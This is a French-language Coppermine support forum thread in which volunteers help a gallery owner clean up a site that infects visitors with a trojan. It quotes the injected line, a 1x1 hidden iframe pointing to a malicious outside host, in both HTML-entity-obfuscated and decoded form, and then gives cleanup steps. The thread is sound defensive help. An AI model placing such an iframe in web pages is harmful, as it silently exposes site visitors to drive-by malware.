[Solved]: problème de virus

soraya95610 · April 21, 2008, 03:02:48 PM

Bonjour ,

J'ai certains des utilisateurs de ma galerie qui ce plaigne d'avoir un virus cheval de troyes quand ils vont sur le site j'ai fais un scan avec le cure mais il n'y a aucun virus dans la galerie :-\

voilà ma galerie

http://wentworthearlmiller.free.fr/site%20interne/wentworthearlmiller/

Pascal YAP · April 21, 2008, 03:28:54 PM

Au risque de vous faire paniquer, ouvrez le code source de votre page d'accueil, allez jusqu'à la ligne 13, vous lirez ceci :

Code Select

 <iframe src='&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#99;&#102;&#101;&#108;&#111;&#109;&#118;&#104;&#107;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#52;&#50;&#46;&#112;&#104;&#112;' width=1 height=1></iframe>

C'est justement le code injecté partout sur toutes les pages de votre site

Fermez votre Galerie, Faites un gros nettoyage.
Vérifiez également que des fichiers non téléchargés par vous ne soient pas dans les dossiers Albums (et sous-dossiers) (ZIP ou JPG)

Et installez de nouveau la version1.4.18

François Keller · April 21, 2008, 03:45:43 PM

le fichier cure.php n'arrive pas toujours à tout trouver.
Je regardez le répertoire albums ainsi que les fichiers que vous n'avez pas réuloadé (config.inc, fichiers du theme etc...)

soraya95610 · April 21, 2008, 04:22:39 PM

Quote from: Pascal YAP on April 21, 2008, 03:28:54 PM
Au risque de vous faire paniquer, ouvrez le code source de votre page d'accueil, allez jusqu'à la ligne 13, vous lirez ceci :
Code Select Expand
<iframe src='http://ccfelomvhk.com/dl/adv542.php' width=1 height=1></iframe>
C'est justement le code injecté partout sur toutes les pages de votre site

Fermez votre Galerie, Faites un gros nettoyage.
Vérifiez également que des fichiers non téléchargés par vous ne soient pas dans les dossiers Albums (et sous-dossiers) (ZIP ou JPG)

Et installez de nouveau la version1.4.18

Merci alors je trouve ou le code source ? une fois avoir trouvé la ligne 13 je supprime ? et enfin comment faire le nettoyage ?

J'ai installé la version 1.4.18 samedi il faut le refaire ?

désolé de vous embêtez avec mes questions

Pascal YAP · April 21, 2008, 04:57:25 PM

QuoteJ'ai installé la version 1.4.18 samedi il faut le refaire ?

Oui, après avoir scrupuleusement scruté le contenu de vos Albums.

soraya95610 · April 21, 2008, 05:00:52 PM

Quote from: Pascal YAP on April 21, 2008, 04:57:25 PM
Oui, après avoir scrupuleusement scruté le contenu de vos Albums.

Quand je regarde mes albums je regarde dans filezilla ?

soraya95610 · April 21, 2008, 05:15:45 PM

Dans userpics j'ai un fichier vide dummy c'est quoi et un 1001 et deux images :-\

Pascal YAP · April 21, 2008, 05:35:59 PM

Le code infectant est parfois nommé avec un extension .JPG
Ces images sont-elles à vous !
Si tel n'est pas le cas, inutile de vous dire de les supprimer

PYAP

François Keller · April 21, 2008, 05:39:36 PM

QuoteDans userpics j'ai un fichier vide dummy c'est quoi

c'est un fichier coppermine, normal qu'il soit vide (il sert pour stocker les fichiers temporaires)

Quote1001 et deux images

c'est le sous répertoire d'upload via html (celui de l'admin à priori) les images qui sont dedans sont soit celles que vous avez téléchargé, sinon, effacez les.

QuoteMerci alors je trouve ou le code source ? une fois avoir trouvé la ligne 13 je supprime ? et enfin comment faire le nettoyage ?

il faut trouver le ou les fichiers qui contiennent le virus:
*remplacez tous les fichiers coppermine (sauf le répertoire albums, le fichier include/config.inc.php, et les fichiers de votre theme) par des fichier propres (version 1.4.18)
*ouvrez avec un éditeur de texte (notepad par exemple) un à un les fichiers que vous n'avez pas remplacé (ceux cités plus haut) et cherchez la ligne incriminée (elle commence par <iframe>) et effacez là. elle peut se trouver dans plusieurs fichiers.
*vérifiez dans le répertoire albums qu'il n'y a pas de fichiers qui ne vous disent rien (fichier .zip ou .jpg avec un nom bizarre (des chiffres en regle générale)) et effacez les le cas échéans.
*lancez le fichier update.php

soraya95610 · April 21, 2008, 05:40:12 PM

J'ai supprimé ces images mais la ligne est toujours là je vérifie avec filezilla tout mes dossiers mais y a rien de suspect sérieux la je comprends pas

Pascal YAP · April 21, 2008, 06:04:13 PM

Quotesauf le répertoire albums, le fichier include/config.inc.php,

Le code peut s'installer ici aussi, c'est une calamité.
Il s'installe même dans les HTML, d'où une vigilance maximum nécessaire.

Relisez le Post de François, vous n'allez pas avancer sinon

PYAP

soraya95610 · April 21, 2008, 09:02:12 PM

Ah j'ai supprimé le virus parfait il était dans le fichier 1100 merci encore pour tout

Pascal YAP · April 21, 2008, 09:34:43 PM

QuoteAh j'ai supprimé le virus parfait il était dans le fichier 1100 merci encore pour tout

Vous parlez sans doute de CONFIG.INC.PHP ?
On ne désespère jamais

PYAP

François Keller · April 21, 2008, 10:49:51 PM

non je pense qu'il s'agit du sous répertoire 1100 du dossier albums

soraya95610 · April 22, 2008, 09:22:50 AM

Oui François Keller c'est celui la il était en jpg donc difficile à voir

coppermine-gallery.com/forum

News:

[Solved]: problème de virus

soraya95610

Pascal YAP

François Keller

soraya95610

Pascal YAP

soraya95610

soraya95610

Pascal YAP

François Keller

soraya95610

Pascal YAP

soraya95610

Pascal YAP

François Keller

soraya95610